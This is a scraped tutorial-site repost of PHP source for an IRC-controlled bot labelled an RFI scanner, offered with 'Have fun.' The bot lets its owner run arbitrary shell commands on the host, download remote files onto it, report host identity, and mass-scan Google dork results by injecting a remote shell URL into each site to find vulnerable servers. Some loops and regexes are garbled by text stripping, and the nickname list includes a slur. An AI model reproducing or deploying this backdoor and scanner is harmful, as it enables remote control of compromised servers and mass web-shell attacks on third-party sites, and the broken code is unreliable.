欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  后端开发

php RFI scanner_PHP教程

程序员文章站 2022-04-19 18:14:05
...
//Config//////////////////////////////////////////////////////////////////
$network = ""; // irc network address //
$port = 6667; // irc network port //
$channel = ""; // irc channel //
$channel_password = ""; // irc channel password //
$owner = ""; // owners nickname //
$owner_password = ""; // login password (MD5 Encoded) //
$trigger = "."; // bot trigger //
$max_results = 150; // maximum Google results //
//End config//////////////////////////////////////////////////////////////

@set_time_limit(0);

function randName(){
$nickparts = Array("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee", "sm4ck", "nigr", "sTench");
$tmp = "";
for($i=0;$i$tmp = $nickparts[mt_rand(0, count($nickparts)-1)] . mt_rand(1000,9999);
}
return $tmp;
}

$sck = fsockopen($network, $port, $errno, $errstr) or die("Connection error: " . $errstr);

function send($msg, $to){
global $sck, $nick;
fputs($sck, "PRIVMSG " . $to . " " . $msg . " ");
}

function pong(){
global $sck;
$dat = @fgets($sck, 1024);
$d = explode(" ", $dat);
if($d[0] == "PING"){
fputs($sck, "PONG " . $d[1]);
}
$dat = "";
}

function get_exec_function(){
$exec_functions = array("popen", "exec", "shell_exec");
$disabled_funcs = ini_get(disable_functions);
foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f;
}

function execute_command($exec_function, $command, $to){
if(!$exec_function){
send("No execution functions...", $to);
}
switch($exec_function){
case "popen": $h = popen($command, "r"); while(!feof($h)) send(fgets($h), $to); break;
case "exec": exec($command, $result); foreach($result as $r) send($r, $to); break;
case "shell_exec": send(shell_exec($command), $to); break;
}
}

function get($url, $out, $to){
if(!$o = fopen($out, "w"))
send("Unable to write file", $to);
else{
if(!$c = file_get_contents($url))
send("Unable to open remote file", $to);
else{
if(!fwrite($o, $c))
send("Unable to save file", $to);
else{
send("File saved", $to);
fclose($o);
}
}
}
}

function encodeDork($s){
$tmp = "";
for($i=0;$i$tmp .= "" . hexdec(bin2hex($s[$i])) . ";";
}
return urlencode($tmp);
}

function shellInject($url, $bug, $shell, $search){
$url = explode("/", $url);
$url = $url[2];
$url = (strpos($url, "www") !== false ? "http://" . $url : "http://www." . $url) . $bug . $shell . "??";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 4);
$ret = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($httpcode == 200){
if(strpos($ret, $search) !== false){
return $url;
}
}
return false;
}

function scan($dork, $bug, $shell, $search, $to){
global $max_results;
if(function_exists(curl_init)){
$ch = curl_init("http://www.google.com/search?q=" . encodeDork($dork) . "&start=0");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
curl_close($ch);
preg_match_all("/of( about)* ([d,]+)/", $ret, $max);
$max = str_replace(",", "", $max[2][0]);
$max = $max > $max_results ? $max_results : $max;
$i = 0;
while($i $ch = curl_init("http://www.google.com/search?q=" . encodeDork($dork) . "&start=" . $i);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
preg_match_all("/

.*?/", $ret, $links);
if(@$links[1]){
foreach($links[1] as $l){
$ret = shellInject($l, $bug, $shell, $search);
if($ret != false){
send("[+] Shell found: " . $ret, $to);
}
}
}
else{
send("No sites found", $to);
}
curl_close($ch);
$i = $max>10 ? $i+=10 : $i++;
send("$i scanned", $to);
pong();
}
}
else{
send("cURL is not enabled", $to);
}
}

$nick = randName();
sleep(1);
fputs($sck, "USER " . $nick . " ? * " . $nick . "@hotmail.com ");
sleep(1);
fputs($sck, "NICK " . $nick . " ");
$loggedin = false;
while(!feof($sck)){
$dat = fgets($sck, 4096);
$d = explode(" ", $dat);
preg_match_all("/:(.+)!(.+) PRIVMSG (.+) :$trigger(w+)s*(.+)*/", $dat, $cmd);
if($d[0] == "PING"){
fputs($sck, "PONG " . $d[1]);
}
if(strpos($dat, "HELP REGISTER") !== false){
fputs($sck, "JOIN " . $channel . " " . $channel_password . " ");
}
if(preg_match("/:(.+)!.+ PRIVMSG .+ :.VERSION(.)/", $dat, $v)){
fputs($sck, "NOTICE " . $v[1] . " " . $v[2] . "VERSION mIRC v6.3 Khaled Mardam-Bey" . $v[2] . " ");
}
if(@$cmd[4][0]){
$from = $cmd[1][0];
$from_host = $cmd[2][0];
$to = $cmd[3][0] == $nick ? $cmd[1][0] : $cmd[3][0];
$command = $cmd[4][0];
$args = $cmd[5][0];
if($from == $owner && $loggedin == true){
switch($command){
case "cmd": execute_command(get_exec_function(), $args, $to); break;
case "die": fputs($sck, "QUIT :Received die from " . $from); die();
case "get": $a = explode(" ", $args); get($a[0], $a[1], $to); break;
case "inf": send("Host: " . $_SERVER[HTTP_HOST] . " Whoami: " . @exec(whoami), $to); break;
case "raw": fputs($sck, $args . " "); break;
case "rfi": $a = explode(" ", $args);
if(count($a) > 3){send("Beginning RFI scan", $to); scan($a[0], $a[1], $a[2], $a[3], $to); send("RFI scan complete", $to);}
else send("Usage: (dork) (bug) (shell) (search)", $to);
break;
case "say": send($args, $to); break;
default: send("Unknown command.", $to);
}
}
elseif($from == $owner && $loggedin == false){
if($command == "login"){
if(md5($args) == $owner_password){
$loggedin = true;
send("User $from successfully logged in.", $to);
}
else{
send("Login failed.", $to);
}
}
}
}
$dat = "";
}
?>


credits flyZ to: Array("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee", "sm4ck", "nigr", "sTench");

Have fun. =)

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/508526.htmlTechArticle?php //Config////////////////////////////////////////////////////////////////// $network = ""; // irc network address // $port = 6667; // irc network port // $channel = ""; // irc...